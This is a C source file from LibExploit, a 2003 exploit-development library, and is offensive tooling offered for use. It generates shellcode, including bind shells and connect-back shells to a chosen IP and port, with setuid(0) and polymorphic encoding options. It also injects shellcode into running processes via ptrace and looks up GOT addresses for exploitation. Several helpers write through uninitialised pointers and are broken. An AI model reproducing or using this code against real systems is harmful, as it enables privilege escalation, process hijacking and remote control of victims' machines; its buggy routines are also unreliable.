/* LibExploit
 *
 * FILENAME : expshell.c
 * DATE     : 09/24/2003
 * CODER    : Simon Roses Femerling
 * ABSTRACT : Shellcode Routines.
 *            Here you will also find libShellCode wrapper functions. 
 *
 * Copyright (C) 2002-2003. Simon Roses Femerling <sroses@ibsec.net>
*/

#include "../include/LibExploit.h"
#include "../include/shellcodes.h"

/*************************************************************
* Global Variables
*************************************************************/

char *objdump_path = NULL;
char *grep_path = NULL;

/*************************************************************
* Functions
*************************************************************/

/*
 * FUNCTION : char *LibExploit_LibshellcodeVer
 * PARAMS   : ...
 * RETURN   : Version of libShellCode
 * ABSTRACT : Return LibShellcode Version.
*/
char *LibExploit_LibshellcodeVer() {
	return libShellCode_version();
}

/*
 * FUNCTION : char *LibExploit_GenerateWriteShell
 * PARAMS   : int out, char *msg, int setuid, int xor
 * RETURN   : A char * with the generated shellcode.
 * ABSTRACT : Generate a write shell.
*/
char *LibExploit_GenerateWriteShell(int out, char *msg, int setuid, int xor) {
	return generate_write_SC(out, msg, setuid, xor);
}

/*
 * FUNCTION : char *LibExploit_GenerateFileShell
 * PARAMS   : char *file, char *msg, int setuid, int xor
 * RETURN   : A char * with the generated shellcode.
 * ABSTRACT : Generate a file write shell.
*/
char *LibExploit_GenerateFileShell(char *file, char *msg, int setuid, int xor) {
	return generate_file_write_SC(file, msg, setuid, xor);
}

/*
 * FUNCTION : char *LibExploit_GenerateExecShell
 * PARAMS   : char *prog, int setuid, int xit, int xor
 * RETURN   : A char * with the generated shellcode.
 * ABSTRACT : Generate a exec shell.
*/
char *LibExploit_GenerateExecShell(char *prog, int setuid, int xit, int xor) {
	return generate_exec_SC(prog, setuid, xit, xor);
}

/*
 * FUNCTION : char *LibExploit_GenerateBindShell
 * PARAMS   : char *prog, int setuid, int xit, int port, int fork, int xor
 * RETURN   : A char * with the generated shellcode.
 * ABSTRACT : Generate a bind shell.
*/
char *LibExploit_GenerateBindShell(char *prog, int setuid, int xit, int port, int fork, int xor) {
	return generate_bind_SC(prog, setuid, xit, port, fork, xor);
}

/*
 * FUNCTION : char *LibExploit_GenerateConnectShell
 * PARAMS   : char *prog, int setuid, int xit, char *ip, int port, int xor
 * RETURN   : A char * with the generated shellcode.
 * ABSTRACT : Generate a connect back shell.
*/
char *LibExploit_GenerateConnectShell(char *prog, int setuid, int xit, char *ip, int port, int xor) {
	return generate_connect_back_SC(prog, setuid, xit, ip, port, xor);
}

/*
 * FUNCTION : char *LibExploit_ShellCreator
 * PARAMS   : ...
 * RETURN   : A char * with the generated shellcode.
 * ABSTRACT : Interactive Shell Creator.
*/
char *LibExploit_ShellCreator() {
	char *egg;
	char c[3];
	char msg[LIBEXPLOIT_INTERNAL_SIZE];
	char type[16];
	char where[16];
	char pfunc[16];
	char file[LIBEXPLOIT_INTERNAL_SIZE];
	char p[8];
	char ip[20];
	int out = 1;
	int setuid;
	int cript;
	int er;
	int exit;
	int port;
	int fork;
	int flag=0;
	int len;

	er = LibExploit_InternalPrint("\n\tWelcome to Shellcode Creator\n\n");
	if(er == -1) {
		return NULL;
	}
	er = LibExploit_InternalPrint(" Select option, please :\n\n");
	if(er == -1) {
		return NULL;
	}
	er = LibExploit_InternalPrint(" 0 - Shellcode that writes a message to stdout/stderr.\n"); 
	if(er == -1) {
		return NULL;
	}
	er = LibExploit_InternalPrint(" 1 - Shellcode that writes a message to file.\n"); 
	if(er == -1) {
		return NULL;
	}
	er = LibExploit_InternalPrint(" 2 - Shellcode that execute a command.\n"); 
	if(er == -1) {
		return NULL;
	}
	er = LibExploit_InternalPrint(" 3 - Shellcode that bind a program to a port.\n"); 
	if(er == -1) {
		return NULL;
	}
	er = LibExploit_InternalPrint(" 4 - Shellcode that connect to an IP:Port and execute a program.\n"); 
	if(er == -1) {
		return NULL;
	}
	er = LibExploit_InternalPrint("\n Option : ");
	if(er == -1) {
		return NULL;
	}

	//
	// Read option and proceed.
	//
	do {
		fgets(c, 3, stdin);
		if((c[0]=='0') ||
		   (c[0]=='1') ||	
		   (c[0]=='2') ||	
		   (c[0]=='3') ||
		   (c[0]=='4')) break;		
	} while(1);

	//
	// Switch to appropiate shellcode.
	//	
	switch(c[0]) {
		case '0': // Write Shellcode.
			er = LibExploit_InternalPrint("\n Write to (1) stdout or (2) stderr : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			if(c[0]=='1') out = 1;
			if(c[0]=='2') out = 2;

			if(out == 1) { sprintf(where, "stdout"); }
			else { sprintf(where, "stderr"); }

			er = LibExploit_InternalPrint(" Message : ");
			if(er == -1) {
				return NULL;
			}
			fgets(msg, LIBEXPLOIT_INTERNAL_SIZE, stdin);
			msg[strlen(msg)-1]='\0';

			er = LibExploit_InternalPrint(" Execute before write (0) Nothing (1) setuid(0) (2) setreuid(0,0) : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			setuid = atoi(c);

			if(setuid == 1) { sprintf(pfunc, "setuid(0)"); }
			else if(setuid == 2) { sprintf(pfunc, "setreuid(0,0)"); }
			else { sprintf(pfunc, ""); }			
			
			er = LibExploit_InternalPrint(" Encrypt shellcode (0) No (1) Yes : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			cript = atoi(c);
			
			if(cript == 1) { sprintf(type, " polymophic "); }
			else { sprintf(type, ""); }

			egg = LibExploit_GenerateWriteShell(out, msg, setuid, cript);
		break;
		case '1': // File Write Shellcode.
			er = LibExploit_InternalPrint("\n Filename : ");
			if(er == -1) {
				return NULL;
			}
			fgets(file, LIBEXPLOIT_INTERNAL_SIZE, stdin);
			file[strlen(file)-1]='\0';

			er = LibExploit_InternalPrint(" Message : ");
			if(er == -1) {
				return NULL;
			}
			fgets(msg, LIBEXPLOIT_INTERNAL_SIZE, stdin);
			msg[strlen(msg)-1]='\0';

			er = LibExploit_InternalPrint(" Execute before write (0) Nothing (1) setuid(0) (2) setreuid(0,0) : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			setuid = atoi(c);

			if(setuid == 1) { sprintf(pfunc, "setuid(0)"); }
			else if(setuid == 2) { sprintf(pfunc, "setreuid(0,0)"); }
			else { sprintf(pfunc, ""); }			
			
			er = LibExploit_InternalPrint(" Encrypt shellcode (0) No (1) Yes : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			cript = atoi(c);
			
			if(cript == 1) { sprintf(type, " polymophic "); }
			else { sprintf(type, ""); }

			egg = LibExploit_GenerateFileShell(file, msg, setuid, cript);			
		break;
		case '2': // Execute Command Shellcode.
			er = LibExploit_InternalPrint("\n Path of program to execute : ");
			if(er == -1) {
				return NULL;
			}
			fgets(file, 128, stdin);
			file[strlen(file)-1]='\0';

			er = LibExploit_InternalPrint(" Execute before write (0) Nothing (1) setuid(0) (2) setreuid(0,0) : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			setuid = atoi(c);

			if(setuid == 1) { sprintf(pfunc, "setuid(0)"); }
			else if(setuid == 2) { sprintf(pfunc, "setreuid(0,0)"); }
			else { sprintf(pfunc, ""); }			
			
			er = LibExploit_InternalPrint(" Execute exit(0) after execve() (0) No (1) Yes : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			exit = atoi(c);

			er = LibExploit_InternalPrint(" Encrypt shellcode (0) No (1) Yes : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			cript = atoi(c);
			
			if(cript == 1) { sprintf(type, " polymophic "); }
			else { sprintf(type, ""); }

			egg = LibExploit_GenerateExecShell(file, setuid, exit, cript);						
		break;
		case '3': // Bind Shellcode.
			er = LibExploit_InternalPrint("\n Path of program to execute : ");
			if(er == -1) {
				return NULL;
			}
			fgets(file, 128, stdin);
			file[strlen(file)-1]='\0';

			er = LibExploit_InternalPrint(" Execute before write (0) Nothing (1) setuid(0) (2) setreuid(0,0) : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			setuid = atoi(c);

			if(setuid == 1) { sprintf(pfunc, "setuid(0)"); }
			else if(setuid == 2) { sprintf(pfunc, "setreuid(0,0)"); }
			else { sprintf(pfunc, ""); }			
			
			er = LibExploit_InternalPrint(" Execute exit(0) after execve() (0) No (1) Yes : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			exit = atoi(c);

			er = LibExploit_InternalPrint(" Port to bind : ");
			if(er == -1) {
				return NULL;
			}			
			fgets(p, 8, stdin);
			port = atoi(p);

			er = LibExploit_InternalPrint(" Execute fork() before execve() (0) No (1) Yes : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			fork = atoi(c);

			er = LibExploit_InternalPrint(" Encrypt shellcode (0) No (1) Yes : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			cript = atoi(c);
			
			if(cript == 1) { sprintf(type, " polymophic "); }
			else { sprintf(type, ""); }

			egg = LibExploit_GenerateBindShell(file, setuid, exit, port, fork, cript);						
		break;
		case '4': // IP Connect Shellcode.
			er = LibExploit_InternalPrint("\n Path of program to execute : ");
			if(er == -1) {
				return NULL;
			}
			fgets(file, 128, stdin);
			file[strlen(file)-1]='\0';

			er = LibExploit_InternalPrint(" Execute before write (0) Nothing (1) setuid(0) (2) setreuid(0,0) : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			setuid = atoi(c);

			if(setuid == 1) { sprintf(pfunc, "setuid(0)"); }
			else if(setuid == 2) { sprintf(pfunc, "setreuid(0,0)"); }
			else { sprintf(pfunc, ""); }			
			
			er = LibExploit_InternalPrint(" Execute exit(0) after execve() (0) No (1) Yes : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			exit = atoi(c);

			er = LibExploit_InternalPrint(" IP to connect : ");
			if(er == -1) {
				return NULL;
			}
			fgets(ip, 20, stdin);
			ip[strlen(ip)-1]='\0';

			er = LibExploit_InternalPrint(" Port to connect : ");
			if(er == -1) {
				return NULL;
			}			
			fgets(p, 8, stdin);
			port = atoi(p);

			er = LibExploit_InternalPrint(" Encrypt shellcode (0) No (1) Yes : ");
			if(er == -1) {
				return NULL;
			}
			fgets(c, 3, stdin);
			cript = atoi(c);
			
			if(cript == 1) { sprintf(type, " polymophic "); }
			else { sprintf(type, ""); }

			egg = LibExploit_GenerateConnectShell(file, setuid, exit, ip, port, cript);						
		break;
	} // End, switch	

return egg;
}

/*
 * FUNCTION : int LibExploit_InjectShell
 * PARAMS   : int pid, char *shl
 * RETURN   :  Return 0 on success or
 *             -1 if fails.
 * ABSTRACT : Injects a given shellcode to the given
 *            proccess ID (pid).
*/
int LibExploit_InjectShell(int pid, char *shl) {
	struct user_regs_struct regs;
	int slen;
	int ptr;
	int i = 0;

	if(ptrace(PTRACE_ATTACH, pid, NULL, NULL)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "ptrace(PTRACE_ATTACH) error");		
		return(-1);
	}
	waitpid(pid, NULL, 0);
	
	if(ptrace(PTRACE_GETREGS, pid, 0, &regs)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "ptrace(PTRACE_GETREGS) error");		
		return(-1);
	}

	regs.esp -= 4;
	if(ptrace(PTRACE_POKETEXT, pid, regs.esp, regs.eip)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "ptrace(PTRACE_POKETEXT) error");		
		return(-1);
	}	
	
	slen = strlen(shl);
	ptr = regs.eip = regs.esp-1024;
	regs.eip+=2;

	while(i < slen) {
		if(ptrace(PTRACE_POKETEXT, pid, ptr, (int)* (int *)(shl+i))) {
			snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "ptrace(PTRACE_POKETEXT) error");		
			return(-1);
		}
		i += 4;
		ptr += 4;
	}	

	if(ptrace(PTRACE_SETREGS, pid, &regs, &regs)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "ptrace(PTRACE_SETREGS) error");		
		return(-1);
	}

	if(ptrace(PTRACE_DETACH, pid, NULL, NULL)) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "ptrace(PTRACE_DETACH) error");		
		return(-1);
	}
	
return 0;
}

/*
 * FUNCTION : int LibExploit_GetGOT 
 * PARAMS   : const char *exe, const char *func
 * RETURN   : Return the Global Offset Table (GOT)
 *            of the functions given or 0 if fails. 
 * ABSTRACT : Get the GOT of a functions of the given program.
*/
int LibExploit_GetGOT(const char *exe, const char *func) {
	int got = 0;
	char cmd[255];
	FILE *fp;	

	if(objdump_path == NULL) objdump_path = OBJDUMP;
	if(grep_path == NULL) grep_path = GREP; 

	snprintf(cmd, 255, "%s -R %s | %s ' %s$'|awk '{ print $1 }'", objdump_path, exe, grep_path, func);	

	fp = popen(cmd, "r");
	if(fp == NULL) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "popen() error");	
		return(0);
	}
	
	if(fscanf(fp, "%x\n", &got) == 0) {
		fclose(fp);
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "fscanf() error");	
		return(0);
	}

	fclose(fp);		

return got;
}

/*
 * FUNCTION : void LibExploit_SetObjdump
 * PARAMS   : char *path
 * RETURN   : ...
 * ABSTRACT : Set Objdump path.
*/
void LibExploit_SetObjdump(char *path) {
	strncpy(objdump_path, path, sizeof(path));
}

/*
 * FUNCTION : void LibExploit_SetGrep
 * PARAMS   : char *path
 * RETURN   : ...
 * ABSTRACT : Set Grep path.
*/
void LibExploit_SetGrep(char *path) {
	strncpy(grep_path, path, sizeof(path));
}

/*
 * FUNCTION : char *LibExploit_AddSetuid
 * PARAMS   : char *shl
 * RETURN   : Return a shellcode (char *) with a setuid(0) in front.
 * ABSTRACT : Add a setuid(0) in front of shellcode.
*/
char *LibExploit_AddSetuid(char *shl) {
	char set_uid[] = "\x31\xc0"   // xorl %eax, %eax 
			 "\x31\xdb"   // xorl %ebx, %ebx
			 "\xb0\x17"   // movb $0x17,%al
			 "\xcd\x80";  // int $0x80

	char *sh;

	sprintf(sh,"%s%s",set_uid,shl);
	
return(sh);	
}

/*
 * FUNCTION : char *LibExploit_AddNOP
 * PARAMS   : char *shl, int num
 * RETURN   : Returns a shellcode (char *) with X number of NOP in front.
 * ABSTRACT : Add a X number of NOP in front a shellcode.
*/
char *LibExploit_AddNOP(char *shl, int num) {
	char *sh;
	char *str;
	int i;

	for(i = 0; i <= num; i++) {
		str[i] = NOP;
	}	

	sprintf(sh,"%s%s",str,shl);

return(sh);
}

/*
 * FUNCTION : int LibExploit_ValidateShell
 * PARAMS   : char *sh, unsigned char *str
 * RETURN   : Returns 0 if shell is ok or
 *            a positive number if shellcode is not validate. 
 * ABSTRACT : Validate a shellcode.
*/
int LibExploit_ValidateShell(char *sh, unsigned char *str) {
	unsigned char *s;
	int count = 0;

	for(;*str;str++) {
		s = strchr(sh, *str);
		if(s) {
			count++;
		}
	}
	
return count;
}

/* SRF E0F */



